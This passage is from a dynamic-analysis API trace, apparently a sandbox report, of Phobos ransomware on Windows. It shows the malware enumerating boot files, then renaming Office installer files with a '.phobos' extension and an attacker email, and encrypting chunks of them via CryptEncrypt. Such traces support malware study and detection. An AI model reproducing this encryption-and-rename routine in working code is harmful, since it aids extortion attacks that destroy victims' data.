dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.719] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.720] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=88144) returned 1 [0132.720] CloseHandle (hObject=0x11c) returned 1 [0132.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui")) returned 0x20 [0132.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.720] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.720] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.720] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.720] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=90704) returned 1 [0132.720] CloseHandle (hObject=0x11c) returned 1 [0132.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui")) returned 0x20 [0132.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.720] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.721] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.721] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.721] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=90704) returned 1 [0132.721] CloseHandle (hObject=0x11c) returned 1 [0132.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui")) returned 0x20 [0132.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.721] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.721] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.721] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.721] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=90176) returned 1 [0132.721] CloseHandle (hObject=0x11c) returned 1 [0132.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui")) returned 0x20 [0132.722] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.722] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.722] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.722] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.722] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=89664) returned 1 [0132.722] CloseHandle (hObject=0x11c) returned 1 [0132.722] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui")) returned 0x20 [0132.722] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.722] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.722] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.722] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.723] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=90192) returned 1 [0132.723] CloseHandle (hObject=0x11c) returned 1 [0132.723] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui")) returned 0x20 [0132.723] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.723] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.723] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.723] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.723] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=87616) returned 1 [0132.723] CloseHandle (hObject=0x11c) returned 1 [0132.726] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui")) returned 0x20 [0132.726] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.726] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.726] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.726] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.726] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=87104) returned 1 [0132.726] CloseHandle (hObject=0x11c) returned 1 [0132.726] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui")) returned 0x20 [0132.726] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.726] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.726] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.727] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.727] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=70720) returned 1 [0132.727] CloseHandle (hObject=0x11c) returned 1 [0132.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui")) returned 0x20 [0132.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.727] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.727] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.727] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.727] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=70224) returned 1 [0132.727] CloseHandle (hObject=0x11c) returned 1 [0132.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui")) returned 0x20 [0132.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.727] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.728] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.728] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.728] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=70208) returned 1 [0132.728] CloseHandle (hObject=0x11c) returned 1 [0132.728] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui")) returned 0x20 [0132.728] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.728] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.728] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.728] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.728] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=383786) returned 1 [0132.728] CloseHandle (hObject=0x11c) returned 1 [0132.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr")) returned 0x27 [0132.729] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x26) returned 0 [0132.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\bootmgr.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.729] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.729] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x27) returned 0 [0132.729] ResetEvent (hEvent=0xec) returned 1 [0132.729] SetEvent (hEvent=0xf0) returned 1 [0132.729] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.729] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.729] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0132.777] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0132.778] ResetEvent (hEvent=0xec) returned 1 [0132.778] SetEvent (hEvent=0xf0) returned 1 [0132.778] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.778] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0132.778] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2506240) returned 1 [0132.778] CloseHandle (hObject=0x14c) returned 1 [0132.778] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi")) returned 0x2020 [0132.778] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0132.779] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0132.779] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0132.779] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0132.779] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0132.892] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xcbf55, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0132.892] ReadFile (in: hFile=0x14c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0133.129] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x223e00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0133.129] ReadFile (in: hFile=0x14c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0133.181] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa2e408) returned 1 [0133.181] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0133.190] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0133.201] CryptDestroyKey (hKey=0xa2e408) returned 1 [0133.201] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0133.201] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0133.235] SetEndOfFile (hFile=0x14c) returned 1 [0133.238] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x223e00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0133.238] WriteFile (in: hFile=0x14c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0133.240] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xcbf55, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0133.240] WriteFile (in: hFile=0x14c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0133.243] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0133.243] WriteFile (in: hFile=0x14c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0133.244] CloseHandle (hObject=0x14c) returned 1 [0134.510] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0134.510] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0134.510] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2503680) returned 1 [0134.510] CloseHandle (hObject=0x14c) returned 1 [0134.510] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi")) returned 0x2020 [0134.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0134.511] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0134.511] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0134.511] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0134.511] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0135.555] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0135.555] ReadFile (in: hFile=0x14c, 